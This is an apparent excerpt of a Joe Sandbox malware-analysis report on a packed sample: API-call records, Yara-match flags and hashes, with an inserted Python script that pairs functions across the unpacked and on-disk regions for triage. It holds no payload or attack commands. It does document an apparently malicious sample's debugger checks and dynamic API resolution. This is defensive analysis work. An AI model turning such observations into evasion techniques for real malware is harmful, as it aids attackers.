                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                    • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                    • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                    • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,024FDAD7), ref: 0251A732
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024FDAD7), ref: 0251A73C
                                                    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024FDAD7), ref: 0251A749
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                    • Instruction ID: 79e5c6c7cc23fe988959f921fb1648d0cce847084bb8f89d4d6f2ee32ce27e68
                                                    • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                    • Instruction Fuzzy Hash: 3431C47490121D9BDB21DF64DD8879CBBB8BF48710F5042EAE40CA72A0E7309B85CF49
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                    • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                    • ExitProcess.KERNEL32 ref: 0042FE99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,0252009C,00000000,00457970,0000000C,025201F3,00000000,00000002,00000000), ref: 025200E7
                                                    • TerminateProcess.KERNEL32(00000000,?,0252009C,00000000,00457970,0000000C,025201F3,00000000,00000002,00000000), ref: 025200EE
                                                    • ExitProcess.KERNEL32 ref: 02520100
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction ID: 1dd3f8aea5f2d484e75243de699cafc562ab42ad7bc02c8f6564c308e84ce17b
                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                    • Instruction Fuzzy Hash: E0E04635002158ABCF116F54CD0CA583F6AFB42B82B400024F9048B1F0CF36DA46DB48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$GetProcAddress.$l
                                                    • API String ID: 0-2784972518
                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction ID: 8cc2ddee45e4730f41419645bc1fe682aa102da875142fd5a7aad30607f3018e
                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction Fuzzy Hash: 41318AB6900609CFEB10CF99C880AAEBBF9FF88324F14504AD941A7315D771EA45CFA4
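The records above list the same routine twice: the GetCurrentProcess/TerminateProcess/ExitProcess function appears once in the PE-backed image at Offset 00400000 and once in the region at Offset 024F0000 ("based on PE: false", with Yara matches), with an identical Opcode ID but different Instruction IDs, while the record carrying the GetProcAddress string exists only in the 024F0000 region. The following script is an added example, not part of the Joe Sandbox report or its tooling. It parses records in the shape printed here, groups them by Opcode ID, and separates functions in the unpacked region that are relocated copies of on-disk code from functions that exist only there. The SAMPLE text is constructed from four of the records above, trimmed to the lines the parser reads; the watchlist of API names is the editor's choice, not something the report defines.

```python
"""Pair Joe Sandbox function records across the two memory-dump regions.
Added example: group 'APIs / Memory Dump Source / Similarity' records by Opcode ID
to see which unpacked-region functions (Offset 024F0000) also exist on disk (00400000)."""
import re
from collections import defaultdict

# Constructed sample: four records copied from the report and trimmed to the
# lines this parser reads (hash values are the report's own).
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003), ref: 0042FE80
• TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003), ref: 0042FE87
• ExitProcess.KERNEL32 ref: 0042FE99
Memory Dump Source
• Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
APIs
• GetCurrentProcess.KERNEL32(00000000,?,0252009C,00000000), ref: 025200E7
• TerminateProcess.KERNEL32(00000000,?,0252009C,00000000), ref: 025200EE
• ExitProcess.KERNEL32 ref: 02520100
Memory Dump Source
• Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
Yara matches
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction Fuzzy Hash: E0E04635002158ABCF116F54CD0CA583F6AFB42B82B400024F9048B1F0CF36DA46DB48
Strings
Memory Dump Source
• Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
Yara matches
• String ID: .$GetProcAddress.$l
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: 41318AB6900609CFEB10CF99C880AAEBBF9FF88324F14504AD941A7315D771EA45CFA4
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,024FDAD7), ref: 0251A732
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024FDAD7), ref: 0251A73C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024FDAD7), ref: 0251A749
Memory Dump Source
• Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
Yara matches
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction Fuzzy Hash: 3431C47490121D9BDB21DF64DD8879CBBB8BF48710F5042EAE40CA72A0E7309B85CF49
"""

API_RE = re.compile(r"•\s+(?P<sub>Part of subcall function \w+: )?(?P<name>\w+)\."
                    r"(?P<module>[A-Z0-9_]+).*\bref: [0-9A-Fa-f]+")
FIELD_RE = re.compile(r"•\s+(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)")
SOURCE_RE = re.compile(r"Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>true|false)")
WATCH_APIS = {"IsDebuggerPresent"}  # editor's watchlist (names taken from the records), not the report's

def new_record():
    return {"apis": [], "subcalls": [], "strings": "", "offset": None,
            "pe_backed": None, "yara": False, "opcode_id": None}

def parse_records(text):
    """One record per 'Instruction Fuzzy Hash' line, the last field of each function."""
    records, cur = [], new_record()
    for line in (raw.strip() for raw in text.splitlines()):
        m = API_RE.match(line)
        if m:  # 'Part of subcall' entries belong to a callee, keep them separate
            cur["subcalls" if m.group("sub") else "apis"].append(m.group("name"))
        elif line == "Yara matches":
            cur["yara"] = True
        elif (m := FIELD_RE.match(line)):
            key, value = m.group("key"), m.group("value")
            if key == "Source File":
                s = SOURCE_RE.search(value)
                cur["offset"], cur["pe_backed"] = s.group("offset"), s.group("pe") == "true"
            elif key == "String ID":
                cur["strings"] = value  # '$'-separated list exactly as the report prints it
            elif key == "Opcode ID":
                cur["opcode_id"] = value
            elif key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = new_record()
    return records

def pair_regions(records, packed="00400000", unpacked="024F0000"):
    """Unpacked-region functions that share an Opcode ID with the on-disk image
    (same opcode stream, operands differ after relocation) versus the rest."""
    by_opcode = defaultdict(dict)
    for r in records:
        by_opcode[r["opcode_id"]][r["offset"]] = r
    shared, unpacked_only = [], []
    for regions in by_opcode.values():
        if unpacked in regions:
            (shared if packed in regions else unpacked_only).append(regions[unpacked])
    return shared, unpacked_only

def triage(records):
    """Flag unpacked-only functions that hit the watchlist or carry a GetProcAddress string.
    A hit is a place to start reading, not a verdict: the IsDebuggerPresent record in the
    sample sits beside SetUnhandledExceptionFilter/UnhandledExceptionFilter, the shape of
    the CRT's own fatal-error path (editor's reading, not the report's)."""
    shared, only = pair_regions(records)
    findings = []
    for r in only:
        hits = sorted(set(r["apis"]) & WATCH_APIS)
        if "GetProcAddress" in r["strings"]:
            hits.append("string:GetProcAddress")
        if hits:
            findings.append((r["opcode_id"][:12], r["yara"], hits))
    return {"shared": len(shared), "unpacked_only": len(only), "findings": findings}

if __name__ == "__main__":
    print(triage(parse_records(SAMPLE)))
```

Run against the full report text instead of SAMPLE to get the real split: every function whose Opcode ID occurs in both regions is relocated code that the analyst can skip, and what remains in the 024F0000 region is the smaller set worth opening in the disassembler.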
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /
                                                    • API String ID: 0-2043925204
                                                    • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                    • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                    • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                    • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /
                                                    • API String ID: 0-2043925204
                                                    • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                    • Instruction ID: 9ca36b455f7922095f0beb625d8031953c7331f29e19d7038973462893e9461c
                                                    • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                    • Instruction Fuzzy Hash: 78412872500229AECB249FB9CC4CEAB7B79FF81714F104268E905DB1C0E3319D49CB68
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: GetLocaleInfoEx
                                                    • API String ID: 2299586839-2904428671
                                                    • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                    • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                    • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                    • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                    • Instruction ID: 5950252d3c26b2f19fc9407f4483f4889235d2af22bd0bbcbaea74ffe3e30164
                                                    • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                    • Instruction Fuzzy Hash: 94021C71E012199BEF14CFA9C8807ADBBF1FF88324F258269D919E7384D731A941CB94
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024F262C
                                                    • PostQuitMessage.USER32(00000000), ref: 024F27CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageNtdllPostProc_QuitWindow
                                                    • String ID:
                                                    • API String ID: 4264772764-0
                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction ID: bf0feea46b843a352f51c93ab1ff5354e74433a0940573ae3d75eb3dd7d21000
                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                    • Instruction Fuzzy Hash: 3A41212596438495E731FFA5BC45B2637B0FF64B26F10252BD628CB2B2E3B28540C75E
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02526F21,?,?,00000008,?,?,0252F3E2,00000000), ref: 02527153
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction ID: 5fe8a4b42b9c57a46b4e3efd9e35a96b914f89fa2f85b985904a258b97838592
                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                    • Instruction Fuzzy Hash: 80B15D322106199FD715CF28C486B65BFE0FF4A368F258658E899CF2E5C335D989CB44
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2955987475-0
                                                    • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                    • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                    • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                    • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 025221A0
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0252B900
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2955987475-0
                                                    • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                    • Instruction ID: f1b5704bc91d4424d9f26127ade7aac5a3c5f5c6e7a1c5cac483119936faf3db
                                                    • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                    • Instruction Fuzzy Hash: 8E21807295022AABDF249F24DC41BBA77ADFB46318F10017AED01E61D0EB359948CB58
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                    • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                    • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                    • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02520A1C,?,0252BC89,00000000,?,?,?), ref: 0252B5A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                    • Instruction ID: 8c6f2357417b79f3f9e6e2cc1fac4e6d79925c01f219a575b303760d98d45aa1
                                                    • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                    • Instruction Fuzzy Hash: 66114C3B3007119FDB189F39C89177ABB92FF85318B14442CD9468B6C0E371B906CB44
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale_free
                                                    • String ID:
                                                    • API String ID: 787680540-0
                                                    • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                    • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                    • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                    • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0252B87A,00000000,00000000,?), ref: 0252BB08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale_free
                                                    • String ID:
                                                    • API String ID: 787680540-0
                                                    • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                    • Instruction ID: fdc4b9bbeb9a33e5df3a3d4c205ccc78c92376cadba02f43926b32ff7be063b8
                                                    • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                    • Instruction Fuzzy Hash: E9F0F936A101366BDB285A24CC45BBA7B68FB4171CF044469DC05A31C4EB70BE09C6D8
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 025221A0
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0252B900
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2955987475-0
                                                    • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                    • Instruction ID: ca342e8b1fe1e39ebf90e1e3d92160afdf69f63f1fd9094146cbd91a988290f9
                                                    • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                    • Instruction Fuzzy Hash: 72012632A511259BCB14AF34DC40BBA33A9EF46311F0441BAEE02EB2C1DA355D08CB54
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                    • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                    • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
